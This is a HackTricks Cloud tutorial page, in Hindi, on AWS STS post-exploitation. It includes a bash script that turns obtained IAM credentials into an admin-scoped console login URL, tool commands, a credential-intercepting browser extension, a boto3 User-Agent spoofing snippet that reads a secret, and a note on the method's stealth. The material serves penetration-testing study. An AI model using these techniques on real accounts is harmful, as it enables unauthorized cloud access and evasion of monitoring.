AWS - STS Post Exploitation

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

सदस्यता योजनाओं की जांच करें!

हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**

हैकिंग ट्रिक्स साझा करें, PRs को HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में सबमिट करके।

STS

अधिक जानकारी के लिए:

AWS - IAM, Identity Center & SSO Enum

यदि आपने कुछ IAM credentials प्राप्त कर लिए हैं तो आप निम्नलिखित टूल्स का उपयोग करके वेब कंसोल में पहुँचने (accessing the web console) में रुचि रख सकते हैं।
ध्यान दें कि user/role के पास अनुमति sts:GetFederationToken होना चाहिए।

कस्टम स्क्रिप्ट

निम्नलिखित स्क्रिप्ट डिफ़ॉल्ट प्रोफ़ाइल और एक डिफ़ॉल्ट AWS लोकेशन (not gov and not cn) का उपयोग करेगी ताकि आपको एक साइन किया हुआ URL मिल सके जिसका उपयोग आप वेब कंसोल में लॉगिन करने के लिए कर सकें:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)


# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

आप https://github.com/NetSPI/aws_consoler के साथ एक वेब कंसोल लिंक जनरेट कर सकते हैं।

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Warning

सुनिश्चित करें कि IAM user के पास sts:GetFederationToken अनुमति हो, या assume करने के लिए एक role प्रदान करें।

aws-vault

aws-vault एक टूल है जो development environment में AWS credentials को सुरक्षित रूप से स्टोर करने और एक्सेस करने के लिए प्रयोग किया जाता है।

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Note

आप aws-vault का उपयोग करके एक ब्राउज़र कंसोल सत्र भी प्राप्त कर सकते हैं

वेब कंसोल से IAM Creds तक

ब्राउज़र एक्सटेंशन https://github.com/AI-redteam/clier नेटवर्क से IAM credentials को ब्राउज़र की मेमोरी में सुरक्षित किए जाने से पहले इंटरसेप्ट करने में सक्षम है।

Python से User-Agent प्रतिबंध बाईपास करें

यदि उपयोग किए गए user agent के आधार पर कुछ क्रियाएं करने पर प्रतिबंध है (जैसे user agent के आधार पर python boto3 library के उपयोग को प्रतिबंधित करना) तो पिछली तकनीक का उपयोग करके आप ब्राउज़र के माध्यम से वेब कंसोल से कनेक्ट करना संभव है, या आप सीधे boto3 user-agent को बदल सकते हैं जैसा कि नीचे किया गया है:

# Shared by ex16x41
# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client
client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )

# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])

`sts:GetFederationToken`

इस अनुमति के साथ, यह उस उपयोगकर्ता के लिए एक federated identity बनाने की अनुमति देता है जो इसे निष्पादित कर रहा है, और यह उन अनुमतियों तक सीमित रहेगा जो उस उपयोगकर्ता के पास हैं।

aws sts get-federation-token --name <username>

sts:GetFederationToken द्वारा लौटाया गया token calling user की federated identity का होता है, लेकिन सीमित permissions के साथ। भले ही user के पास administrator rights हों, कुछ क्रियाएँ जैसे listing IAM users या attaching policies federated token के माध्यम से नहीं की जा सकतीं।

इसके अतिरिक्त, यह method कुछ हद तक अधिक stealthy है, क्योंकि federated user AWS Portal में दिखाई नहीं देता — इसे केवल CloudTrail logs या monitoring tools के माध्यम से देखा जा सकता है।

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

सदस्यता योजनाओं की जांच करें!

हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमें Twitter 🐦 @hacktricks_live** पर फॉलो करें।**

हैकिंग ट्रिक्स साझा करें, PRs को HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में सबमिट करके।